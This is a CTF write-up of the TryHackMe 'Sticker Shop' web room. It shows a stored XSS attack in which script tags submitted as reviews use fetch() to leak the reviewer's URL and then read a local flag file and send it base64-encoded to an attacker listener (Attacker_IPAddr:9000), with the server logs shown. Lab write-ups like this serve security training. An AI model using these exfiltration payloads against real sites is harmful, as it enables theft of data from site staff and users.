WriteUp: The Sticker Shop

###### tags: `ctf` `thm` `writeUP` `web` `XSS` ## The Sticker Shop https://tryhackme.com/r/room/thestickershop For the first time, I run the web server on port 9000 on my attack pc. ``` python3 -m http.server 9000 ``` and then submit a test script to the review ``` <script>fetch('http://Attacker_IPAddr:9000/index.php')</script> ``` I got the result. it works ``` shell └─$ python3 -m http.server 9000 Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ... 10.10.30.220 - - [20/Jan/2025 05:58:28] code 404, message File not found 10.10.30.220 - - [20/Jan/2025 05:58:28] "GET /index.php HTTP/1.1" 404 - 10.10.30.220 - - [20/Jan/2025 05:58:39] code 404, message File not found 10.10.30.220 - - [20/Jan/2025 05:58:39] "GET /index.php HTTP/1.1" 404 - ``` Next, I checked the URL used by the staff to review the messages. ``` js <script>fetch('http://Attacker_IPAddr:9000/steal?cookie=' + btoa(window.location.href));</script> ``` I found that they use the localhost IP for this: `http://127.0.0.1:8080/view_feedback`. ``` bash 10.10.30.220 - - [20/Jan/2025 07:17:13] code 404, message File not found 10.10.30.220 - - [20/Jan/2025 07:17:13] "GET /steal?cookie=aHR0cDovLzEyNy4wLjAuMTo4MDgwL3ZpZXdfZmVlZGJhY2s= HTTP/1.1" 404 - ^C Keyboard interrupt received, exiting. ┌──(kali㉿kali)-[~] └─$ echo "aHR0cDovLzEyNy4wLjAuMTo4MDgwL3ZpZXdfZmVlZGJhY2s=" | base64 -d http://127.0.0.1:8080/view_feedback ``` Now we can create a script to read the flag file and send it as a Base64 string. ``` js <script> fetch('http://Attacker_IPAddr:9000/start'); response = await fetch('http://127.0.0.1:8080/flag.txt'); text = await response.text(); fetch('http://Attacker_IPAddr:9000/?'+btoa(text)); fetch('http://Attacker_IPAddr:9000/end'); </script> ``` ``` js <script> fetch( "http://127.0.0.1:8080/flag.txt") .then(response => { if (!response.ok) { fetch('http://Attacker_IPAddr:9000/notok'); throw new Error(`HTTP error! Status: ${response.status}`); } return response.text(); // Read response as text }) .then(data => { fetch('http://Attacker_IPAddr:9000/?'+btoa(data)); // Display content on the page }) .catch(error => { fetch('http://Attacker_IPAddr:9000/'+ `Error: ${error.message}`); document.getElementById("content").textContent = `Error: ${error.message}`; }); </script> ``` ``` js <script> let response = await fetch('http://127.0.0.1:8080/flag.txt'); let text = await response.text(); fetch('http://Attacker_IPAddr:9000/?'+btoa(text)); </script> ``` it gives me positive result ``` ──(kali㉿kali)-[~] └─$ python3 -m http.server 9000 Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ... 10.10.30.220 - - [20/Jan/2025 07:20:29] "GET /?VEhNezgzNzg5YTY5M...........3OWNmY2FiZThiNjIzMDVlZTZ9 HTTP/1.1" 200 - ^C Keyboard interrupt received, exiting. ┌──(kali㉿kali)-[~] └─$ echo "VEhNezgzNzg5YTY5MDc0ZjY.........WNmY2FiZThiNjIzMDVlZTZ9 " | base64 -d THM{83789a690.......e8b62305ee6}base64: invalid input ``` the key is ``` THM{83789a69074f.....05ee6} ```